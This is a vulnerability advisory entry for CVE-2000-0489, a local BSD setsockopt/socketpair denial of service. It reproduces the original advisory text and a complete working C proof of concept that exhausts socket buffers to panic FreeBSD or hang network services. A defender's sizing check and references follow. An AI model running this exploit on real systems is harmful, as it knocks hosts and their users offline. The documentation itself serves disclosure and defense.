Multi-vendor setsockopt() denial-of-service vulnerability

Vulnerability ID: 1105533
Vulnerability type: Other
Published: 1999-09-05
Updated: 2005-05-02
CVE ID: CVE-2000-0489
CNNVD-ID: CNNVD-199909-012
Platform: BSD
CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/19488
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-012
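|Vulnerability details
FreeBSD, NetBSD and OpenBSD are vulnerable. An attacker can cause a denial of service by using the socketpair function to create a large number of socket pairs, setting large buffers on them with setsockopt, and writing data to them.
|Exploit (EXP)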
source: http://www.securityfocus.com/bid/622/info

A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD, and potentially other operating systems based in some part on BSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding.

Details behind why this happens have not been made available. 

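#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <fcntl.h>

#define BUFFERSIZE 204800

int
main(void)
{
    int p[2], i;
    char crap[BUFFERSIZE];   /* payload contents do not matter, only the size */

    /* Keep creating socket pairs until socketpair() fails. */
    while (1)
    {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
            break;
        /* Set send and receive buffers on both ends to BUFFERSIZE. */
        i = BUFFERSIZE;
        setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
        /* Non-blocking, so the writes return instead of waiting for a reader. */
        fcntl(p[0], F_SETFL, O_NONBLOCK);
        fcntl(p[1], F_SETFL, O_NONBLOCK);
        /* Write a full buffer's worth into each end; nothing ever reads it. */
        write(p[0], crap, BUFFERSIZE);
        write(p[1], crap, BUFFERSIZE);
    }
    exit(0);
}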
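
An added example, not part of the original advisory or PoC: a defender's sizing check that reads back the buffer sizes the kernel actually grants for the 204800-byte request used above and multiplies them by the soft RLIMIT_NOFILE to estimate how much socket-buffer data one unprivileged process could queue. The function names and the ceiling formula are assumptions made for illustration.

```c
#include <stdio.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <unistd.h>

/* Request `want` bytes for SO_SNDBUF and SO_RCVBUF on one socketpair end and
 * return what the kernel actually granted (send + receive), or -1 on error. */
long granted_per_socket(int want)
{
    int p[2], snd = 0, rcv = 0;
    socklen_t len = sizeof(snd);
    long total = -1;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
        return -1;
    /* The kernel may refuse or clamp the request; getsockopt shows the result. */
    (void)setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &want, sizeof(want));
    (void)setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &want, sizeof(want));
    if (getsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &snd, &len) == 0) {
        len = sizeof(rcv);
        if (getsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &rcv, &len) == 0)
            total = (long)snd + (long)rcv;
    }
    close(p[0]);
    close(p[1]);
    return total;
}

/* Assumed ceiling: every descriptor the limit allows is a socket whose send
 * and receive buffers are both full. Kernel bookkeeping is not counted. */
long long worst_case_bytes(long per_socket, unsigned long long max_fds)
{
    return per_socket < 0 ? -1 : (long long)per_socket * (long long)max_fds;
}

int main(void)
{
    struct rlimit rl;
    long per = granted_per_socket(204800); /* BUFFERSIZE from the PoC */
    if (per < 0 || getrlimit(RLIMIT_NOFILE, &rl) == -1)
        return 1;
    printf("granted per socket: %ld bytes\n", per);
    if (rl.rlim_cur == RLIM_INFINITY)
        printf("RLIMIT_NOFILE unlimited: no per-process ceiling\n");
    else
        printf("RLIMIT_NOFILE=%llu, ceiling %lld bytes per process\n",
               (unsigned long long)rl.rlim_cur,
               worst_case_bytes(per, (unsigned long long)rl.rlim_cur));
    return 0;
}
```

Compare the reported ceiling with the memory the host can spare for network buffers; the figure is per process, so it scales with the number of processes a user may run.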
|References

Source: XF
Name: bsd-setsockopt-dos
Link: http://xforce.iss.net/static/3298.php
Source: BUGTRAQ
Name: 19990826 Local DoS in FreeBSD
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.10.9908270039010.16315-100000@thetis.deor.org
Source: BUGTRAQ
Name: 20000601 Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability - Mac OS X affected
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg=NCBBKFKDOLAGKIAPMILPCEJLCEAA.labs@ussrback.com
Source: BID
Name: 622
Link: http://www.securityfocus.com/bid/622